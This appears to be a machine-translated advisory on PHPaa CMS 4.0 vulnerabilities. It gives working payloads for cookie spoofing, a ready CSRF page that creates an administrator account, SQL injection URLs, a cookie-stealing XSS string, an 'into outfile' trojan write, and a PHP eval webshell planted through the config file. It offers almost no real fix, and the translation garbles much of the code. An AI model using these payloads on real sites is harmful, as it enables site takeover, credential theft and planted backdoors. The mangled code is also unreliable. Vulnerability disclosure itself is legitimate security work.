PHPaa CMS 4.00day and repair (multiple defects)

 

Author: Brother Fei

1. Cookie spoofing:

Cause:

Log on to the background only when the Cookie is not null

If (! Isset ($ _ COOKIE ['userid']) | empty ($ _ COOKIE ['userid']) {

// If userid is not set or userid is empty

Setcookie (lastURL, get_url (); // last access address

Header ("Location: login. php"); // jump to the logon page}

Test:

Javascript: alert (document. cookie = "userid = 1") assigns a value to the Cookie

Then you can log on directly to the background.

2. CSRF

Cause:

The Front-End message board supports html. The source of the submitted information cannot be determined when the background is added for management.

Bit. You can add a verification code to prevent CSRF from judging the referer.

Test

Capture packets when adding an administrator and construct an HTML page for adding the administrator to the remote server.

Run the <a herf = "remote HTML"> Add an administrator to test </A>

The form is added to the message. When the Administrator clicks the link, an administrator is added.

CSRF Exp

<Html>

<Head> Exp PHPpaCMS CSRF brother or Fei

<Body onload = javascript: document. form. submit ()>

<Form action = "http://www.bkjia.com/cms/phpaaCMS/admin/user. action. php" method = "post" name = "form">

<Input type = "hidden" name = "act" value = "add">

<Input type = "hidden" name = "username" value = "feihacker">

<Input type = "hidden" name = "password" value = "xxxx">

<Input type = "hidden" name = "password2" value = "xxxx">

<Input type = "hidden" name = "userid" value = "0">

</Body>

</Html>

 

3. injection:

Cause:

This error occurs when the parameter filtering is not in place and the SQL statement is directly introduced.

Vulnerability page

Admin/page. add. php

Admin/message. action. php

Admin/article. add. php

Search. php

$ Userid = trim ($ _ GET ['userid'])? Trim ($ _ GET ['userid']): 0; // only spaces are filtered

Find ("select * from phpaadb_users where userid =". $ userid );

The above three pages are caused by lax filtering of userids.

Test:

Http://www.bkjia.com/phpaaCMS/admin/friendlink. add. php? Act = edit & id = 1% 20and % 201 = 2% 20 union % 20 select % 28%, 3, user %, 5, 6

Http://www.bkjia.com/phpaaCMS/admin/user. add. php? Act = edit, & userid = 31 union

Select 1, user (), 3

Http://www.bkjia.com/phpaaCMS/admin/article. add. php? Act = add & cid = 1 & id = 32% 27

4. XSS

Cause:

The entered html Tag cannot be filtered during search

Vulnerability page search. php

Test

Http://www.bkjia.com/phpaacms/search. php? Keywords => "> <ScRiPt

> Alert (document. cookie); </ScRiPt>

5. You can write one sentence to restore data in the background:

Cause:

You can customize SQL statements to recover data.

Test:

Write the following code in your SQL script:

Select * from hacker union select '1' from mysql. user

Outfile 'd: \ www \ hack. php'

A Trojan can be generated during recovery.

6. Write a sentence to the configuration file

Cause:

Write the website configuration information to the website. inc. php file.

Test

You cannot directly write regular php Trojans,

/")?> <? Php @ eval ($ _ POST [hack] // This is a correct sentence for PHP constructed by me.

Well closed. When writing website configuration information, write the deformation trojan in the Administrator's email address.

Yes

Fixed: changed